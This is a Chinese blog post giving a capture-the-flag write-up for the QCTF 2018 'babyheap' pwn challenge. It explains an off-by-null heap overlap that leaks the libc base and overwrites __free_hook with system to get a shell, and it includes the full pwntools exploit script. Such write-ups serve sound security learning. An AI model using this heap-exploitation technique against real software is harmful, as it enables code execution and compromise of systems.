XCTF 4th-QCTF-2018 babyheap

最新推荐文章于 2021-02-13 20:06:02 发布
最新推荐文章于 2021-02-13 20:06:02 发布
阅读量1.8k 收藏 1
点赞数
分类专栏: 栈溢出 堆溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41071646/article/details/97612786
版权

这几天做pwn题做的很恶心了,,等下个星期想去继续肝内核pwn。。

先看一下这个题目的保护

基本该有的保护都有了

然后先看一下这个题   ida里面分析

 发现了 程序没有给我们堆块修改的功能 这里可以通过 堆块合并 /重叠  然后申请达到修改堆块还有泄露堆块的目的

这里我们发现了   off by null

然后这里的思路 exp 来源于

https://www.xctf.org.cn/library/details/8723e039db0164e2f7345a12d2edd2a5e800adf7/

然后off by null的 利用思路就是堆块合并的时候   伪造一个大的堆块 然后 伪造一个  堆块头 

create(0x100-8,'A'*0x20+'\n')#0
create(0x650-8,'B'*0x5f0+p64(0x600)+p64(0x50)+'\n')#1
create(0x500,'C'*0x20+'\n')#2
create(0x100,'D'*0x20+'\n')#3

然后我们

delete(0)
delete(1)

这个时候 2的  prev_size 也就变成了 0x650

然后 我们

create(0x100-8,'A'*0xf8+'\n')#0
create(0x500-8,'E'*0x10+'\n')#1
create(0x100-8,'F'*0x10+'\n')#4

这里的申请0  就把  0x650 变成了 0x600

然后 然后申请了  1 4 正好把600给申请完  但是这里  的 prev_size 并没变 (紧紧挨着的  伪造的chunks状态没有发生变化)

如果在 dele1 2 那么 就会引发堆块合并

如果这里在 申请0x500的空间

create(0x500-8,'G'*0x10+'\n')#1
show()
#gdb.attach(s)
#pause()
s.recvuntil('4 : ')
libc = u64(s.recv(6)+'\x00'*2)#-0x3ebca0

那么就可以泄露基址了  而且 如果在申请0x100的空间 unsortbin 会切0x100  那么  就会引发重叠  

那么就可以把system的地址写入 hook_free  可以直接拿shell

#coding:utf-8
from pwn import *
context.log_level='debug'
debug=1
if debug:
    s=process('./timu')
else:
    s=remote('',)
libcs=ELF("/lib/x86_64-linux-gnu/libc-2.27.so")
def create(size,pay):
    s.recvuntil('Your choice :')
    s.sendline('1')
    s.recvuntil('Size:')
    s.sendline(str(size))
    s.recvuntil('Data:')
    s.send(pay)

def delete(idx):
    s.recvuntil('Your choice :')
    s.sendline('2')
    s.recvuntil('Index')
    s.sendline(str(idx))
def show():
        s.recvuntil('Your choice :')
        s.sendline('3')

create(0x100-8,'A'*0x20+'\n')#0
create(0x650-8,'B'*0x5f0+p64(0x600)+p64(0x50)+'\n')#1
create(0x500,'C'*0x20+'\n')#2
create(0x100,'D'*0x20+'\n')#3
delete(0)
delete(1)
create(0x100-8,'A'*0xf8+'\n')#0
create(0x500-8,'E'*0x10+'\n')#1
create(0x100-8,'F'*0x10+'\n')#4
#gdb.attach(s)
#pause()
delete(1)
#gdb.attach(s)
#pause()
delete(2)
#gdb.attach(s)
#pause()
create(0x500-8,'G'*0x10+'\n')#1
show()
#gdb.attach(s)
#pause()
s.recvuntil('4 : ')
libc = u64(s.recv(6)+'\x00'*2)#-0x3ebca0
print hex(libc)
libc=libc-0x1b7ca0
print hex(libc)
#gdb.attach(s)
#pause()
create(0x100-8,'H'*0x10+'\n')#2
#gdb.attach(s)
#pause()
delete(4)
delete(2)
create(0x100-8,p64(libc+0x1b98E8)+'\n')
create(0x100-8,p64(libc+0x1b98E8)+'\n')
#gdb.attach(s)
#pause()
create(0x100-8,p64(libc+libcs.sym['system'])+'\n')
#gdb.attach(s)
#pause()
create(0x200-8,'/bin/sh\x00'+'\n')#6
delete(6)
s.interactive()

参考链接

https://www.xctf.org.cn/library/details/8723e039db0164e2f7345a12d2edd2a5e800adf7/

pipixia233333
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
[QCTF2018]babyre
qq_37439229的博客
05-07 606
一道一般般的题。。。 打开ida,调试到这里 发现长度为0x20,于是输入“ABCDEFGHIJKLMNOPQRSTUVWXYZ[]^-`” 第一个函数 打乱我的输入顺序,第二个函数从第三个数开始,每四个为一组分别加一些数,第三个函数从第9个开始,每四个一组进行一些位运算 写出脚步 flag=[0xda,0xd8,0x3d,0x4c,0xe3,0x63,0x97,0x3d,0xc1,0x91,...
QCTF2018 Misc - picture writeup
xuchen16的博客
07-17 973
转载自:https://www.jianshu.com/p/55c5477567fe 看到提示(我承认我一开始没想到。。。。)解密图片,   之后拿到加密逻辑脚本,发现是DES的实现脚本,写出解密脚本 #_*_ coding:utf-8 _*_ import re import sys ip= (58, 50, 42, 34, 26, 18, 10, 2, ...
babyheap 2017漏洞分析
小强的博客
10-12 2208
直接拿http://uaf.io/exploitation/2017/03/19/0ctf-Quals-2017-BabyHeap2017.html的完整exp分析吧 这是0ctf 2017的一道pwn题。 主要是两点,第一点是怎么泄露libc的基地址,第二点是怎么执行shell 漏洞点:在fill函数中,IDA逆向分析如下: unsigned __in
攻防世界PWN之Babyheap(null off by one)题解
seaaseesa的博客
11-20 2157
Babyheap(null off by one) 本题用到的知识 malloc_hook、realloc_hook、fastbin attack、unsorted bin合并 首先,检查一下程序的保护机制,保护全开 然后用IDA分析,发现在创建并读入数据时,有一个null off by one漏洞 我们所能利用的也就是这个漏洞 第一步仍然是想办法泄露一些关键地址 由于可以溢...
RCTF-2018 babyheap详解
极目楚天舒的博客
06-19 1854
0x01题目分析qts@qts-PC:~/奇幻世界/RCTF2018/babyheap_38af156349af04e8f6dc22a0ffee6a7a$ ./checksec.sh --file babyheap RELRO STACK CANARY NX PIE RPATH RUNPATH FIL...
XCTF-HW-pipeline附件
最新发布
11-09
附件
xctf_huaweicloud-qualifier-2020
05-31
xctf_huaweicloud-qualifier-2020写上去译文原始码类别名称网址分数解决了PWN cp 游戏 快速执行 Fastga mysqli 迷你人 nday_container_escape qemu-zzz 网络隐藏云我的1 我的2 派尔 网壳 :cross_mark: 杂项以太网 谁...
XCTF-2019-tfboys:XCTF 2019最终网络任务“ tfboys”的源代码
05-18
XCTF-2019-tfboys tfboys又名TensorFlow Boys 部署(Python3) pip install -r requirements.txt cd web3 python run.py 迪尔斯 web3/model/default/ : pre-trained LSTM model. exploit/exploit.ipynb : codes...
记一次非常巧妙的思路 2017 0ctf babyheap 的exp
哒君的博客
08-01 337
收获 malloc的时候,根据堆分配器规则,它会依次处理 unsorted bin 中的 chunk,将其放入到对应的 bin 中,之后会再次尝试分配 chunk 若之前释放的 chunk 比当前申请的 chunk 大,可以从其前面分割出来一块 malloc_hook附近的fake chunk 的size为0x7f 堆的始终是 4KB 对齐的 (?_ ?) exp: 因为保护全开,则简单的A...
NewsCenter
06-23
自己做的系统,运行没什么问题,页面不是很多,主要有有添加新闻、删除新闻、查看新闻、修改新闻等操作。是三层架构。
babyheap_0ctf_2017 ——堆入门
wuyvle的博客
02-13 399
主要思路: fastbin attack unsortedbin attack 泄露libc地址 malloc_hook劫持程序流 这个函数有4个功能 Allocate:分配内存大小并给出 index Fill:输入 index ,并分配内存进行内容写入操作 Free:输入 index ,释放相应的内存空间 Dump:输入 index ,打印内容 分配的大小不能超过 4096 字节 *(24LL * i + a1):置 1 表示 chunk 已经创建 *(a1 + 24LL * i + 8):存储 c
0ctf 2017 babyheap writeup
jmp esp
03-26 6343
前言坑比的我比赛的时候没有做。。第二天有课,赛后看了看,题目其实没啥太多难度,可能也就是细节上需要注意一下吧题目题目功能简单介绍一下题目功能,因为我本机是用的linux,ida在虚拟机里,ida的复制又不是特别方便,所以我就不复制分析的情况了,具体分析自己做一下练习一下也比较好,就把大致的情况说明一下。首先是主菜单===== Baby Heap in 2017 ===== 1. Allocate 2
攻防世界(pwn)babyheap(一些常见的堆利用方法)
PLpa的博客
03-22 2037
前言: 此题攻击链路:null_off_by_one修改堆块信息 => UAF泄露libc基址和其他有用信息 => fastbin attack申请堆块到指定地址 => 利用realloc_hook来调整堆栈 => one_gadget get shell。 64位程序,保护全开。 程序提供增删查操作,没有改操作。由于题目已经给了libc-2.23文件(虽然给错了)说明...
pwn CTF 4th-QCTF-2018 stack2
qq_41071646的博客
01-23 3438
先把程序跑一遍看看·~~~~~~~ 然后我们好像可以 加数还有 改变数   4功能好像还是 求平均数的 ~~~~ 看来功能还是很齐全的吗~~~~  然后我们 咦 这里的平均数为啥是  2.00呢 ~!~~~~  带着疑问去 看ida 这里好像没有什么毛病  限制了 输入的数量是99 然后往下看   这里就是bug了    因为我们没有检查v13数组的边界 这里我们可...
XCTF 4th-QCTF-2018 dice_game
qq_43409582的博客
10-23 737
首先开一下保护除了canary什么都开了。。。 然后就打开ida分析: read函数造成了栈溢出漏洞。 继续审代码,发现是一个游戏。该程序首先让输入name,并且使用read来读入数据,故而此处存在栈溢出漏洞。下方看见程序使用seed、srand生成随机数。当我们猜对50次随机数时程序会调用sub_B28函数,从而得到flag. 这个随机数咋办呢,,有栈溢出漏洞可以利用,所以就想着能不能将seed...
QCTF 2018xman夏令营选拔赛
Xi4or0uji
07-15 2196
小肉鸡太菜了,就只做了三题orz....... x-man-a-face 这题挺简单的,拿到一个图片,看见有个二维码 发现少了两个定位点,用photoshop补全 扫一下就出来一串KFBVIRT3KBZGK5DUPFPVG2LTORSXEX2XNBXV6QTVPFZV6TLFL5GG6YTTORSXE7I= 然后base32解码就行了 Lottery 这题是弱类型匹配,进...
QCTF 2018 misc和web签到题 writeup
xuchen16的博客
07-16 3386
一、misc X-man-A face   用画图编辑补全二维码如下 用微信扫码得到 KFBVIRT3KBZGK5DUPFPVG2LTORSXEX2XNBXV6QTVPFZV6TLFL5GG6YTTORSXE7I=   用python的base32解码得到答案QCTF{Pretty_Sister_Who_Buys_Me_Lobster}   二、 web 1.NewsC...
攻防世界-Web-lottery(.git泄露、php源码审计、弱类型利用)-XCTF 4th-QCTF-2018
Sea_Sand息禅
04-26 4550
扫描目录,发现.git泄露: 提取.git泄露的源码,得到许多文件: 网站这里: 应该是买到手之后就能拿到flag,如果是这个flag就在.git里,那就好办了,尝试配合grep命令在这些文件中查找flag,并没有结果,要想有钱买flag,首页就给我们提供了一个方法: 买彩票猜数就行了,但是怎么能猜对?这就要审计一下代码,找找漏洞了。 经过一番审计,猜数字对应的函数在api.ph...
web-ics-05
07-28
- *1* *3* [xctf-web-ics05](https://blog.csdn.net/zhejichensha_l7l/article/details/113530046)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值